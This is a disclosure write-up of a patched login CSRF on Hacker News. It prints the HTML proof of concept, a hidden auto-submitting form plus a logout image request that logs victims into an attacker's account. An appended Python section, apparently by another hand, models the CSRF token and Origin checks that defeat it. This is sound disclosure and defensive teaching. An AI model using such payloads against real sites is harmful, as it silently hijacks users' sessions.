On February 17th, I discovered a session riding vulnerability on the login and logout forms of Hacker News. The attack was a cross site request forgery (CSRF), triggered by clicking an article posted by the attacker.
When we think of malicious hackers, we often imagine them trying to log into accounts they don’t own. But the reverse approach - forcing legitimate users to log into an attacker’s account without realizing it - can be just as harmful.
The attack worked like this:
- Attacker submits a title like “CSRF And You (2008)” with a URL that points to the exploit code.
- User clicks on interesting article.
- User is logged out of account, silently logged into an attacker-controlled account, and sent to the comments section.
- User reads comments section for interesting article.
- User does other, more sensitive actions in the attacker-controlled account (apply for YC? change email? add credit card? make brilliant karma-rich submission?).
The exploit code looked like this:
```html
<!-- Hidden body; the onload handler submits the form as soon as the page loads -->
<body onload="document.getElementById('csrf_demo').submit()" style="display:none;">
  <!-- Cross-site GET request that logs the victim out of their own account -->
  <img src="https://news.ycombinator.com/logout" />
  <!-- Cross-site POST that logs the victim into the attacker-controlled account, then redirects to the item page -->
  <form id="csrf_demo" action="https://news.ycombinator.com/login" method="post">
    <input name="goto" value="item?id=11122018">
    <input name="acct" value="csrf">
    <input name="pw" value="password">
  </form>
</body>
```
I contacted Dan at Hacker News and the team immediately patched the vulnerabilities. This attack no longer works as described above.
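The page describes the attack but not the fix. As an added example (not the page's code and not Hacker News's actual patch, which the post does not show), here is a minimal server-side model of the two controls that close both halves of the attack: logout must be a POST carrying a per-session synchronizer token, so the cross-site `<img>` GET no longer works, and login must carry the same token, so a forged cross-site form cannot log the victim into an attacker-controlled account. The `Session` class, the handler names, `ALLOWED_ORIGINS`, the in-memory credential store and the "attacker.example" origin are all constructed for the demonstration; the `Origin`/`Referer` check is defence in depth on top of the token, not a replacement for it.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional

# Assumed origin of the site being defended; any other Origin/Referer is cross-site.
ALLOWED_ORIGINS = {"https://news.ycombinator.com"}


@dataclass
class Session:
    """Constructed stand-in for a server-side session record keyed by the session cookie."""
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))
    user: Optional[str] = None


def render_login_form(session: Session) -> str:
    """The site's own login form embeds the per-session token as a hidden field.
    A page on another origin cannot read it, so a forged form cannot include it."""
    return (
        '<form action="/login" method="post">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input name="acct"><input name="pw" type="password"></form>'
    )


def token_matches(session: Session, form: Dict[str, str]) -> bool:
    """Constant-time comparison of the submitted token against the session's token."""
    submitted = form.get("csrf_token", "").encode()
    return hmac.compare_digest(submitted, session.csrf_token.encode())


def origin_ok(headers: Dict[str, str]) -> bool:
    """Defence in depth: reject a request whose browser-supplied Origin (or Referer)
    names another site. Missing headers are tolerated because the token is the primary control."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin in ALLOWED_ORIGINS
    referer = headers.get("Referer")
    if referer is not None:
        return any(referer.startswith(o + "/") for o in ALLOWED_ORIGINS)
    return True


def handle_login(session: Session, method: str, headers: Dict[str, str],
                 form: Dict[str, str], verify_credentials: Callable[[str, str], bool]) -> int:
    """HTTP-style status: 405 wrong method, 403 CSRF failure, 401 bad password, 200 success."""
    if method != "POST":
        return 405
    if not token_matches(session, form) or not origin_ok(headers):
        return 403
    acct = form.get("acct", "")
    if not verify_credentials(acct, form.get("pw", "")):
        return 401
    session.user = acct
    session.csrf_token = secrets.token_urlsafe(32)  # rotate the token on a privilege change
    return 200


def handle_logout(session: Session, method: str, headers: Dict[str, str],
                  form: Dict[str, str]) -> int:
    """Logout is a state change: require POST plus the token so an <img src=...> GET cannot trigger it."""
    if method != "POST":
        return 405
    if not token_matches(session, form) or not origin_ok(headers):
        return 403
    session.user = None
    session.csrf_token = secrets.token_urlsafe(32)
    return 200


def _verify(acct: str, pw: str) -> bool:
    # Constructed credential store for the demo; a real site checks a password hash.
    return {"alice": "correct horse", "csrf": "password"}.get(acct) == pw


def simulate_page_attack() -> Dict[str, object]:
    """Replay the two requests from the page's exploit against a logged-in victim session."""
    victim = Session(user="alice")
    attacker_headers = {"Origin": "https://attacker.example"}  # constructed cross-site origin
    logout_status = handle_logout(victim, "GET", attacker_headers, {})
    login_status = handle_login(victim, "POST", attacker_headers,
                                {"acct": "csrf", "pw": "password", "goto": "item?id=11122018"}, _verify)
    return {"logout": logout_status, "login": login_status, "still_logged_in_as": victim.user}


def simulate_legitimate_login() -> Dict[str, object]:
    """A user submits the site's own form, which carries the session token."""
    s = Session()
    token = s.csrf_token
    assert token in render_login_form(s)  # the rendered form embeds the token
    status = handle_login(s, "POST", {"Origin": "https://news.ycombinator.com"},
                          {"csrf_token": token, "acct": "alice", "pw": "correct horse"}, _verify)
    return {"login": status, "user": s.user, "token_rotated": s.csrf_token != token}


if __name__ == "__main__":
    print(simulate_page_attack())       # {'logout': 405, 'login': 403, 'still_logged_in_as': 'alice'}
    print(simulate_legitimate_login())  # {'login': 200, 'user': 'alice', 'token_rotated': True}
```

With these checks the replayed exploit fails on both requests and the victim stays in their own session; a `SameSite=Lax` or `Strict` attribute on the session cookie would block the same cross-site POST at the browser, and is worth setting alongside the token rather than instead of it.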